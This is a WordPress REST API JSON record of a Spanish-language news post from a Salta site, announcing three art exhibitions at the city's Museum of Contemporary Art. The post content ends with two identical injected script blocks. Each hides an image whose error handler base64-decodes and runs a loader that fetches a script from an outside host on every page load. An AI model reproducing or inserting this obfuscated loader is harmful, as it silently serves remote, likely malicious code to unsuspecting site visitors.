{"id":3387,"date":"2023-12-04T16:42:15","date_gmt":"2023-12-04T19:42:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3387"},"modified":"2025-08-14T00:04:03","modified_gmt":"2025-08-14T03:04:03","slug":"nuevas-y-variadas-muestras-en-el-mac","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3387","title":{"rendered":"Nuevas y variadas muestras en el MAC"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#840726\"><em>El mi\u00e9rcoles 6 de diciembre, a las 10, en Zuvir\u00eda 90, se presentar\u00e1n las obras Proyecto Institucional Colecciones y Coleccionistas II Edici\u00f3n\u201d, \u201c40 A\u00f1os de Democracia en Argentina\u201d y \u201cNaturaleza Originaria en V.A.C.A\u201d.<\/em><\/h4>\n\n\n\n<p>El Museo de Arte Contempor\u00e1neo inaugurar\u00e1 distintas muestras, el pr\u00f3ximo mi\u00e9rcoles 6 de diciembre.<\/p>\n\n\n\n<p>Desde las 10, en Zuvir\u00eda 90, se presentar\u00e1n las obras: \u201cProyecto Institucional Colecciones y Coleccionistas II Edici\u00f3n\u201d, de Luis Escoda, que incluye una serie de relaciones, encuentros y lecturas entre las obras seleccionadas, &nbsp;\u201c40 A\u00f1os de Democracia en Argentina\u201d, de Otilia Carrique, donde el arte en perspectiva, pol\u00edtica y transformadora colabora con la comprensi\u00f3n de la realidad, e impulsa a seguir avanzando en la convicci\u00f3n de construir un mundo mejor &nbsp;y \u201cNaturaleza Originaria en V.A.C.A\u201d, de Gustavo Reyes Ruiz, que mostrar\u00e1 una selecci\u00f3n de pinturas con yaguaret\u00e9s &nbsp;y naturaleza de la selva.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/nuevas-y-variadas-muestras-en-el-mac-93140\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mi\u00e9rcoles 6 de diciembre, a las 10, en Zuvir\u00eda 90, se presentar\u00e1n las obras Proyecto Institucional Colecciones y Coleccionistas II Edici\u00f3n\u201d, \u201c40 A\u00f1os de Democracia en Argentina\u201d y \u201cNaturaleza Originaria en V.A.C.A\u201d. El Museo de Arte Contempor\u00e1neo inaugurar\u00e1 distintas muestras, el pr\u00f3ximo mi\u00e9rcoles 6 de diciembre. Desde las 10, en Zuvir\u00eda 90, se presentar\u00e1n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3388,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-3387","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3387"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3387"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3387\/revisions"}],"predecessor-version":[{"id":6901,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3387\/revisions\/6901"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3388"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}